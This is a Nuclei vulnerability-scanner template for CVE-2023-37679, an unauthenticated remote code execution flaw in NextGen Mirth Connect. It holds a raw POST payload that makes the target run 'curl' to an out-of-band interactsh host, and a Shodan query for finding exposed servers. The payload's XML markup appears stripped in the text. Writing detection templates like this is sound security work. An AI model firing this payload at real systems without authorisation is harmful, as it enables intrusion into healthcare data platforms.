id: CVE-2023-37679

info:
  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37679
    - http://mirth.com
    - http://nextgen.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37679
    cwe-id: CWE-77
    epss-score: 0.06338
    epss-percentile: 0.92877
    cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nextgen
    product: mirth_connect
    shodan-query: title:"mirth connect administrator"
  tags: cve,cve2023,nextgen,rce

http:
  - raw:
      - |
        GET /api/server/version HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI

      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
        Content-Type: application/xml

        foo java.lang.Comparable curl http://{{interactsh-url}}/ start

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<4.4.1")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code_1 == 200 && status_code_2 == 500'
        condition: and

    extractors:
      - type: regex
        part: body_1
        name: version
        group: 1
        regex:
          - '(.*)'
        internal: true
# digest: 4b0a00483046022100a0c00941f093455de58df4e45bce0f88473cf039647e6a866999835470a73910022100b18fa110f43787e75aefc4f0ae20cea957c290d17151de706cc20a4a1e9d8561:922c64590222798bb761d5b6d8e72950